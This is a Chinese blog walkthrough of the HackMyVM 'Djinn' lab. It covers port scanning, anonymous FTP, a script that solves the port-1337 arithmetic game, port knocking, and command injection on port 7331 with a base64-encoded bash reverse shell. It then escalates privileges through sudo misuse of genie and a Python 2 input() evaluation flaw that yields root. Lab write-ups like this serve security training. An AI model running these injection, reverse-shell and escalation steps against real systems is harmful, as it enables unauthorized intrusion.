lvzhouhang

HackmyVM-Djinn

  • ~10.07K 字
  1. 1. 信息搜集
  2. 2. 21端口
  3. 3. 1337端口
  4. 4. 7331端口
  5. 5. 提权SAM
  6. 6. 提权ROOT

信息搜集

1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1    0a:00:27:00:00:11       (Unknown: locally administered)
192.168.31.2    08:00:27:e7:50:e0       PCS Systemtechnik GmbH
192.168.31.176  08:00:27:36:b4:d6       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 3.098 seconds (82.63 hosts/sec). 3 respondeds

192.168.31.176是靶机ip

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# rustscan -a 192.168.31.176 -r 1-65535
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 65435'.
Open 192.168.31.176:21
Open 192.168.31.176:1337
Open 192.168.31.176:7331
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-06 04:49 EDT
Initiating ARP Ping Scan at 04:49
Scanning 192.168.31.176 [1 port]
Completed ARP Ping Scan at 04:49, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:49
Completed Parallel DNS resolution of 1 host. at 04:49, 0.04s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 04:49
Scanning 192.168.31.176 [3 ports]
Discovered open port 21/tcp on 192.168.31.176
Discovered open port 1337/tcp on 192.168.31.176
Discovered open port 7331/tcp on 192.168.31.176
Completed SYN Stealth Scan at 04:49, 0.02s elapsed (3 total ports)
Nmap scan report for 192.168.31.176
Host is up, received arp-response (0.00032s latency).
Scanned at 2025-05-06 04:49:46 EDT for 0s

PORT     STATE SERVICE REASON
21/tcp   open  ftp     syn-ack ttl 64
1337/tcp open  waste   syn-ack ttl 64
7331/tcp open  swx     syn-ack ttl 64
MAC Address: 08:00:27:36:B4:D6 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

21端口

21端口可以匿名登录,里面有三个文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# ftp anonymous@192.168.31.176
Connected to 192.168.31.176.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||15556|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0              11 Oct 20  2019 creds.txt
-rw-r--r--    1 0        0             128 Oct 21  2019 game.txt
-rw-r--r--    1 0        0             113 Oct 21  2019 message.txt
1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# cat creds.txt
nitu:81299
┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# cat game.txt
oh and I forgot to tell you I've setup a game for you on port 1337. See if you can reach to the
final level and get the prize.
┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# cat message.txt
@nitish81299 I am going on holidays for few days, please take care of all the work.
And don't mess up anything.

给了一个用户名,一个账号密码,还有一个游戏部署在1337上

1337端口

nc连接是个口算题卡,写个脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
import re
import socket

def get_question(s):
    data = s.recv(1024).decode()
    print(data)
    question_re=re.search(r'(\d.+)\)',data)
    if question_re:
        question=question_re.group(1)
        return question
    else:
        return None
def send_answer(s,answer):
    print(answer)
    s.sendall(answer.encode()+b'\n')
def main():
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(('192.168.31.176',1337))
    for _ in range(1,1002):
        question=get_question(s)
        if not question:
            continue
        print(question)
        answer = str(eval(question.replace(',','').replace("'",'')))
        send_answer(s,answer)  
    s.close()
if __name__ == '__main__':
    main()

会给一个Here is your gift , I hope you know what to do with it: 1356, 6784, 3409knock一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# knock 192.168.31.176 1356 6784 3409

┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# rustscan -a 192.168.31.176 -r 1-65535
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned ports so fast, even my computer was surprised.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 65435'.
Open 192.168.31.176:21
Open 192.168.31.176:22
Open 192.168.31.176:1337
Open 192.168.31.176:7331
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-06 05:13 EDT
Initiating ARP Ping Scan at 05:13
Scanning 192.168.31.176 [1 port]
Completed ARP Ping Scan at 05:13, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:13
Completed Parallel DNS resolution of 1 host. at 05:13, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 05:13
Scanning 192.168.31.176 [4 ports]
Discovered open port 21/tcp on 192.168.31.176
Discovered open port 22/tcp on 192.168.31.176
Discovered open port 7331/tcp on 192.168.31.176
Discovered open port 1337/tcp on 192.168.31.176
Completed SYN Stealth Scan at 05:13, 0.02s elapsed (4 total ports)
Nmap scan report for 192.168.31.176
Host is up, received arp-response (0.00043s latency).
Scanned at 2025-05-06 05:13:30 EDT for 0s

PORT     STATE SERVICE REASON
21/tcp   open  ftp     syn-ack ttl 64
22/tcp   open  ssh     syn-ack ttl 64
1337/tcp open  waste   syn-ack ttl 64
7331/tcp open  swx     syn-ack ttl 64
MAC Address: 08:00:27:36:B4:D6 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds
           Raw packets sent: 5 (204B) | Rcvd: 5 (204B)

现在22端口开了,但是之前给的账号密码不对

7331端口

看看7331端口是什么,扫一下目录,能扫到一个/wish,是一个执行命令的地方,输入命令执行之后会跳转http://192.168.31.176:7331/genie?name=uid%3D33%28www-data%29+gid%3D33%28www-data%29+groups%3D33%28www-data%29%0A命令确实是执行了,反弹个shell

1
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMxLjEyOS80NDQ0IDA+JjE=|base64 -d |bash

提权SAM

在/home/nitish/.dev下有一个凭证

1
2
www-data@djinn:/home/nitish/.dev$ cat creds.txt
nitish:p4ssw0rdStr3r0n9
1
2
3
4
5
6
7
nitish@djinn:~$ sudo -l
Matching Defaults entries for nitish on djinn:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nitish may run the following commands on djinn:
    (sam) NOPASSWD: /usr/bin/genie
1
2
nitish@djinn:~$ sudo -u sam /usr/bin/genie -c '/bin/sh'
Pass your wish to GOD, he might be able to help you.

哈哈哈哈 -c不行,看看其他参数,man手册里还有一个-cmd的参数

1
2
3
nitish@djinn:~$ sudo -u sam /usr/bin/genie -cmd id
my man!!
$

提权ROOT

1
2
3
4
5
6
7
sam@djinn:~$ sudo -l
Matching Defaults entries for sam on djinn:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sam may run the following commands on djinn:
    (root) NOPASSWD: /root/lago

sam的家目录下有一个.pyc,进行反编译

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
#!/usr/bin/env python
# visit https://tool.lu/pyc/ for more information
# Version: Python 2.7

from getpass import getuser
from os import system
from random import randint

def naughtyboi():
    print 'Working on it!! '


def guessit():
    num = randint(1, 101)
    print 'Choose a number between 1 to 100: '
    s = input('Enter your number: ')
    if s == num:
        system('/bin/sh')
    else:
        print 'Better Luck next time'


def readfiles():
    user = getuser()
    path = input('Enter the full of the file to read: ')
    print 'User %s is not allowed to read %s' % (user, path)


def options():
    print 'What do you want to do ?'
    print '1 - Be naughty'
    print '2 - Guess the number'
    print '3 - Read some damn files'
    print '4 - Work'
    choice = int(input('Enter your choice: '))
    return choice


def main(op):
    if op == 1:
        naughtyboi()
    elif op == 2:
        guessit()
    elif op == 3:
        readfiles()
    elif op == 4:
        print 'work your ass off!!'
    else:
        print 'Do something better with your life'

if __name__ == '__main__':
    main(options())

可以直接传入一个num,他会将你传入的num解析成变量就可以通过了,或者就爆破我就不试了

1
2
3
4
5
6
7
8
9
10
11
sam@djinn:/home/sam$ sudo /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:2
Choose a number between 1 to 100:
Enter your number: num
# id
uid=0(root) gid=0(root) groups=0(root)
本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可
赞助喵
非常感谢您的喜欢!
赞助喵
分享这一刻
让朋友们也来瞅瞅!